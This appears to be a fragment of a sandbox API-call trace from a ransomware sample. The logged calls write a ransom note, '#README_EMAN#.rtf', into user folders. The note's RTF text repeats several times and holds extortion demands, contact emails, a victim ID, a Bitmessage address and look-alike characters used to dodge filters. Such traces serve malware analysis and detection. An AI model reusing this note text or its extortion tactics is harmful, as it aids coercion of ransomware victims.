}}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.109] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.109] CloseHandle (hObject=0x2ec) returned 1 [0291.109] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user 